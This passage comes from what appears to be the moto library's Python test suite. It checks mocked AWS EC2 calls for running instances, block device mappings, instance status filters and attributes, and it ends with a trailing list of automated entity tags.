    conn = boto.connect_ec2("the_key", "the_secret")
    reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
    instance = reservation.instances[0]
    instance.key_name.should.equal("keypair_name")
@mock_ec2
def test_run_instance_with_block_device_mappings():
    ec2_client = boto3.client("ec2", region_name="us-east-1")
    kwargs = {
        "MinCount": 1,
        "MaxCount": 1,
        "ImageId": EXAMPLE_AMI_ID,
        "KeyName": "the_key",
        "InstanceType": "t1.micro",
        "BlockDeviceMappings": [{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}}],
    }
    ec2_client.run_instances(**kwargs)
    instances = ec2_client.describe_instances()
    volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
        "Ebs"
    ]
    volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
    volumes["Volumes"][0]["Size"].should.equal(50)


@mock_ec2
def test_run_instance_with_block_device_mappings_missing_ebs():
    ec2_client = boto3.client("ec2", region_name="us-east-1")
    kwargs = {
        "MinCount": 1,
        "MaxCount": 1,
        "ImageId": EXAMPLE_AMI_ID,
        "KeyName": "the_key",
        "InstanceType": "t1.micro",
        "BlockDeviceMappings": [{"DeviceName": "/dev/sda2"}],
    }
    with pytest.raises(ClientError) as ex:
        ec2_client.run_instances(**kwargs)
    ex.value.response["Error"]["Code"].should.equal("MissingParameter")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    ex.value.response["Error"]["Message"].should.equal(
        "The request must contain the parameter ebs"
    )


@mock_ec2
def test_run_instance_with_block_device_mappings_missing_size():
    ec2_client = boto3.client("ec2", region_name="us-east-1")
    kwargs = {
        "MinCount": 1,
        "MaxCount": 1,
        "ImageId": EXAMPLE_AMI_ID,
        "KeyName": "the_key",
        "InstanceType": "t1.micro",
        "BlockDeviceMappings": [
            {"DeviceName": "/dev/sda2", "Ebs": {"VolumeType": "standard"}}
        ],
    }
    with pytest.raises(ClientError) as ex:
        ec2_client.run_instances(**kwargs)
    ex.value.response["Error"]["Code"].should.equal("MissingParameter")
    ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
    ex.value.response["Error"]["Message"].should.equal(
        "The request must contain the parameter size or snapshotId"
    )


@mock_ec2
def test_run_instance_with_block_device_mappings_from_snapshot():
    ec2_client = boto3.client("ec2", region_name="us-east-1")
    ec2_resource = boto3.resource("ec2", region_name="us-east-1")
    volume_details = {
        "AvailabilityZone": "1a",
        "Size": 30,
    }
    volume = ec2_resource.create_volume(**volume_details)
    snapshot = volume.create_snapshot()
    kwargs = {
        "MinCount": 1,
        "MaxCount": 1,
        "ImageId": EXAMPLE_AMI_ID,
        "KeyName": "the_key",
        "InstanceType": "t1.micro",
        "BlockDeviceMappings": [
            {"DeviceName": "/dev/sda2", "Ebs": {"SnapshotId": snapshot.snapshot_id}}
        ],
    }
    ec2_client.run_instances(**kwargs)
    instances = ec2_client.describe_instances()
    volume = instances["Reservations"][0]["Instances"][0]["BlockDeviceMappings"][0][
        "Ebs"
    ]
    volumes = ec2_client.describe_volumes(VolumeIds=[volume["VolumeId"]])
    volumes["Volumes"][0]["Size"].should.equal(30)
    volumes["Volumes"][0]["SnapshotId"].should.equal(snapshot.snapshot_id)
@mock_ec2_deprecated
def test_describe_instance_status_no_instances():
    conn = boto.connect_ec2("the_key", "the_secret")
    all_status = conn.get_all_instance_status()
    len(all_status).should.equal(0)


@mock_ec2_deprecated
def test_describe_instance_status_with_instances():
    conn = boto.connect_ec2("the_key", "the_secret")
    conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
    all_status = conn.get_all_instance_status()
    len(all_status).should.equal(1)
    all_status[0].instance_status.status.should.equal("ok")
    all_status[0].system_status.status.should.equal("ok")


@mock_ec2_deprecated
def test_describe_instance_status_with_instance_filter_deprecated():
    conn = boto.connect_ec2("the_key", "the_secret")
    # We want to filter based on this one
    reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
    instance = reservation.instances[0]
    # This is just to set up the test
    conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
    all_status = conn.get_all_instance_status(instance_ids=[instance.id])
    len(all_status).should.equal(1)
    all_status[0].id.should.equal(instance.id)
    # Calling get_all_instance_status with a bad id should raise an error
    with pytest.raises(EC2ResponseError) as cm:
        conn.get_all_instance_status(instance_ids=[instance.id, "i-1234abcd"])
    cm.value.code.should.equal("InvalidInstanceID.NotFound")
    cm.value.status.should.equal(400)
    cm.value.request_id.should_not.be.none
@mock_ec2
def test_describe_instance_credit_specifications():
    conn = boto3.client("ec2", region_name="us-west-1")
    reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
    result = conn.describe_instance_credit_specifications(
        InstanceIds=[reservation["Instances"][0]["InstanceId"]]
    )
    assert (
        result["InstanceCreditSpecifications"][0]["InstanceId"]
        == reservation["Instances"][0]["InstanceId"]
    )


@mock_ec2
def test_describe_instance_status_with_instance_filter():
    conn = boto3.client("ec2", region_name="us-west-1")
    reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)
    instance1 = reservation["Instances"][0]
    instance2 = reservation["Instances"][1]
    instance3 = reservation["Instances"][2]
    conn.stop_instances(InstanceIds=[instance1["InstanceId"]])
    stopped_instance_ids = [instance1["InstanceId"]]
    running_instance_ids = sorted([instance2["InstanceId"], instance3["InstanceId"]])
    all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)

    # Filter instances using the state name
    state_name_filter = {
        "running_and_stopped": [
            {"Name": "instance-state-name", "Values": ["running", "stopped"]}
        ],
        "running": [{"Name": "instance-state-name", "Values": ["running"]}],
        "stopped": [{"Name": "instance-state-name", "Values": ["stopped"]}],
    }
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_name_filter["running_and_stopped"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(all_instance_ids)
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_name_filter["running"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(running_instance_ids)
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_name_filter["stopped"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(stopped_instance_ids)

    # Filter instances using the state code
    state_code_filter = {
        "running_and_stopped": [
            {"Name": "instance-state-code", "Values": ["16", "80"]}
        ],
        "running": [{"Name": "instance-state-code", "Values": ["16"]}],
        "stopped": [{"Name": "instance-state-code", "Values": ["80"]}],
    }
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_code_filter["running_and_stopped"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(all_instance_ids)
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_code_filter["running"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(running_instance_ids)
    found_statuses = conn.describe_instance_status(
        IncludeAllInstances=True, Filters=state_code_filter["stopped"]
    )["InstanceStatuses"]
    found_instance_ids = [status["InstanceId"] for status in found_statuses]
    sorted(found_instance_ids).should.equal(stopped_instance_ids)
@requires_boto_gte("2.32.0")
@mock_ec2_deprecated
def test_describe_instance_status_with_non_running_instances():
    conn = boto.connect_ec2("the_key", "the_secret")
    reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
    instance1, instance2, instance3 = reservation.instances
    instance1.stop()
    instance2.terminate()
    all_running_status = conn.get_all_instance_status()
    all_running_status.should.have.length_of(1)
    all_running_status[0].id.should.equal(instance3.id)
    all_running_status[0].state_name.should.equal("running")
    all_status = conn.get_all_instance_status(include_all_instances=True)
    all_status.should.have.length_of(3)
    status1 = next((s for s in all_status if s.id == instance1.id), None)
    status1.state_name.should.equal("stopped")
    status2 = next((s for s in all_status if s.id == instance2.id), None)
    status2.state_name.should.equal("terminated")
    status3 = next((s for s in all_status if s.id == instance3.id), None)
    status3.state_name.should.equal("running")


@mock_ec2_deprecated
def test_get_instance_by_security_group():
    conn = boto.connect_ec2("the_key", "the_secret")
    conn.run_instances(EXAMPLE_AMI_ID)
    instance = conn.get_only_instances()[0]
    security_group = conn.create_security_group("test", "test")
    with pytest.raises(EC2ResponseError) as ex:
        conn.modify_instance_attribute(
            instance.id, "groupSet", [security_group.id], dry_run=True
        )
    ex.value.error_code.should.equal("DryRunOperation")
    ex.value.status.should.equal(400)
    ex.value.message.should.equal(
        "An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
    )
    conn.modify_instance_attribute(instance.id, "groupSet", [security_group.id])
    security_group_instances = security_group.instances()
    assert len(security_group_instances) == 1
    assert security_group_instances[0].id == instance.id
@mock_ec2
def test_modify_delete_on_termination():
    ec2_client = boto3.resource("ec2", region_name="us-west-1")
    result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
    instance = result[0]
    instance.load()
    instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(True)
    instance.modify_attribute(
        BlockDeviceMappings=[
            {"DeviceName": "/dev/sda1", "Ebs": {"DeleteOnTermination": False}}
        ]
    )
    instance.load()
    instance.block_device_mappings[0]["Ebs"]["DeleteOnTermination"].should.be(False)


@mock_ec2
def test_create_instance_ebs_optimized():
    ec2_resource = boto3.resource("ec2", region_name="eu-west-1")
    instance = ec2_resource.create_instances(
        ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True
    )[0]
    instance.load()
    instance.ebs_optimized.should.be(True)
    instance.modify_attribute(EbsOptimized={"Value": False})
    instance.load()
    instance.ebs_optimized.should.be(False)
    instance = ec2_resource.create_instances(
        ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,
    )[0]
    instance.load()
    instance.ebs_optimized.should.be(False)


@mock_ec2
def test_run_multiple_instances_in_same_command():
    instance_count = 4
    client = boto3.client("ec2", region_name="us-east-1")
    client.run_instances(
        ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count
    )
    reservations = client.describe_instances()["Reservations"]
    reservations[0]["Instances"].should.have.length_of(instance_count)
    instances = reservations[0]["Instances"]
    for i in range(0, instance_count):
        instances[i]["AmiLaunchIndex"].should.be(i)
@mock_ec2
def test_describe_instance_attribute():
    client = boto3.client("ec2", region_name="us-east-1")
    security_group_id = client.create_security_group(
        GroupName="test security group", Description="this is a test security group"
    )["GroupId"]
    client.run_instances(
        ImageId=EXAMPLE_AMI_ID,
        MinCount=1,
        MaxCount=1,
        SecurityGroupIds=[security_group_id],
    )
    instance_id = client.describe_instances()["Reservations"][0]["Instances"][0][
        "InstanceId"
    ]
    valid_instance_attributes = [
        "instanceType",
        "kernel",
        "ramdisk",
        "userData",
        "disableApiTermination",
        "instanceInitiatedShutdownBehavior",
        "rootDeviceName",
        "blockDeviceMapping",
        "productCodes",
        "sourceDestCheck",
        "groupSet",
        "ebsOptimized",
        "sriovNetSupport",
    ]
    for valid_instance_attribute in valid_instance_attributes:
        response = client.describe_instance_attribute(
            InstanceId=instance_id, Attribute=valid_instance_attribute
        )
        if valid_instance_attribute == "groupSet":
            response.should.have.key("Groups")
            response["Groups"].should.have.length_of(1)
            response["Groups"][0]["GroupId"].should.equal(security_group_id)
        elif valid_instance_attribute == "userData":
            response.should.have.key("UserData")
            response["UserData"].should.be.empty
    invalid_instance_attributes = [
        "abc",
        "Kernel",
        "RamDisk",
        "userdata",
        "iNsTaNcEtYpE",
    ]
    for invalid_instance_attribute in invalid_instance_attributes:
        with pytest.raises(ClientError) as ex:
            client.describe_instance_attribute(
                InstanceId=instance_id, Attribute=invalid_instance_attribute
            )
        ex.value.response["Error"]["Code"].should.equal("InvalidParameterValue")
        ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
        message = "Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute.".format(
            invalid_instance_attribute=invalid_instance_attribute
        )
        ex.value.response["Error"]["Message"].should.equal(message)


@mock_ec2
def test_warn_on_invalid_ami():
    if settings.TEST_SERVER_MODE:
        raise SkipTest("Can't capture warnings in server mode.")
    ec2 = boto3.resource("ec2", "us-east-1")
    with pytest.warns(
        PendingDeprecationWarning,
        match=r"Could not find AMI with image-id:invalid-ami.+",
    ):
        ec2.create_instances(ImageId="invalid-ami", MinCount=1, MaxCount=1)
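
# A sketch of how this test module can be exercised locally (the exact module
# path is an assumption; in the moto repository these tests live under
# tests/test_ec2/):
#
#   pip install moto boto boto3 sure pytest
#   pytest -k "run_instance" tests/test_ec2/test_instances.py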
",62433,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface(""eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], 
['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], ['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 
'token.sh'], ['URL', 'not.be.no'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], 
['URL', 'network-interface.pr'], ['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instances.sh'], ['URL', 'instance.id'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', 'instance.state.sh'], ['URL', 'conn.st'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.st'], ['URL', '.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.re'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.re'], ['URL', 'instance.state.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance.mo'], 